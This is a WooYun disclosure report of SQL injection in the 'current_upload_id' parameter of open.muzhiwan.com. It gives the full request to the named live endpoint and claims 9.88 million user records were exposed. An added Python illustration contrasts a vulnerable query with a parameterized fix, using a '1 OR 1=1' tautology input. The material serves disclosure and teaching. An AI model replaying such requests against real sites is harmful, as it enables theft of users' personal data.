Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0148779

Title: A Muzhiwan (拇指玩) sub-site has an SQL injection vulnerability (affecting ten million users)

Vendor: muzhiwan.com

Author: 路人甲

Submitted: 2015-10-23 09:01

Fixed: 2015-12-07 15:38

Published: 2015-12-07 15:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-10-23: Details sent to the vendor; awaiting vendor handling
2015-10-23: Vendor confirmed; details disclosed to the vendor only
2015-11-02: Details disclosed to core white hats and domain experts
2015-11-12: Details disclosed to regular white hats
2015-11-22: Details disclosed to intern white hats
2015-12-07: Details disclosed to the public

Brief description:

Details:

POST /?action=game&navTabId=create_new_game&opt=addSave HTTP/1.1
Content-Length: 624
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://open.muzhiwan.com:80/
Cookie: PHPSESSID=sughd79go0e42smscfhl6pjpq7
Host: open.muzhiwan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

agencyimg=&agencyimg_file=%e4%b8%8a%e4%bc%a0%e7%8b%ac%e4%bb%a3%e6%8e%88%e6%9d%83%e4%b9%a6&copyrightimg=&copyrightimg_file=&cover=&cover_file=&current_upload_id=1&date=01/01/1967&descript=1&exit=&gametype=1&gname=njpbaqht&hezuo=334&icon=&icon512=&icon512_file=&icon_file=&isself=0&qudao=%e7%94%b5%e4%bf%a1&remark=1&sdate=%e5%a4%a7%e6%a6%82%e6%97%b6%e9%97%b4%ef%bc%8c%e5%a6%82%ef%bc%9a%e4%b8%83%e6%9c%88%e5%88%9d&selecttest1=2&serviceTel=555-666-0606&shot%5b%5d=&shot_file_add1=&tid=31&video=1

Injection point: current_upload_id
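To show the defect class behind this injection point, here is an added illustration that is not part of the original report or of Muzhiwan's code: a hypothetical `addSave` lookup modelled in Python over an in-memory SQLite table, with the string-spliced query beside a type-checked, parameterized one. The table, its columns and the two request bodies are constructed assumptions; only the parameter name comes from the report.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for whatever table the addSave action reads (assumption).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE uploads (id INTEGER PRIMARY KEY, owner INTEGER, path TEXT)")
    con.executemany("INSERT INTO uploads VALUES (?, ?, ?)",
                    [(1, 100, "/u/100/a.apk"), (2, 200, "/u/200/b.apk"),
                     (3, 300, "/u/300/c.apk")])
    return con

def upload_id_from_body(body):
    """Pull current_upload_id out of a form-encoded POST body like the one above."""
    return parse_qs(body).get("current_upload_id", [""])[0]

def lookup_vulnerable(con, upload_id):
    # Hypothetical vulnerable pattern: the raw parameter becomes part of the SQL text,
    # so anything after the digits is executed as SQL rather than compared as data.
    sql = "SELECT path FROM uploads WHERE id = " + upload_id
    return [row[0] for row in con.execute(sql)]

def lookup_fixed(con, upload_id):
    # Hardened form: enforce the expected type first, then bind the value as a
    # parameter so the database never interprets it as SQL.
    if not upload_id.isdigit():
        raise ValueError("current_upload_id must be a positive integer")
    cur = con.execute("SELECT path FROM uploads WHERE id = ?", (int(upload_id),))
    return [row[0] for row in cur]

# Constructed bodies: the normal value and a tautology that widens the WHERE clause.
BENIGN_BODY = "gname=njpbaqht&current_upload_id=1&tid=31"
TAUTOLOGY_BODY = "gname=njpbaqht&current_upload_id=1 OR 1=1&tid=31"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, benign:   ", lookup_vulnerable(db, upload_id_from_body(BENIGN_BODY)))
    print("vulnerable, tautology:", lookup_vulnerable(db, upload_id_from_body(TAUTOLOGY_BODY)))
    print("fixed, benign:        ", lookup_fixed(db, upload_id_from_body(BENIGN_BODY)))
    try:
        lookup_fixed(db, upload_id_from_body(TAUTOLOGY_BODY))
    except ValueError as exc:
        print("fixed, tautology:      rejected:", exc)
```

The vulnerable lookup returns every row for the tautology body, which is the behaviour a dump of all 25 databases depends on; the fixed lookup rejects the same body before any query runs.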

[screenshot: 11.png]

25 databases:

[screenshot: 333.png]

[screenshot: 555.jpg]

Database: mzw
[226 tables]

Involves data on 9.88 million users:

[screenshot: 777.png]

Proof of vulnerability:

Fix recommendation:

Copyright: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-10-23 15:36

Vendor reply:

Many thanks, we will fix it promptly.

Latest status:

None yet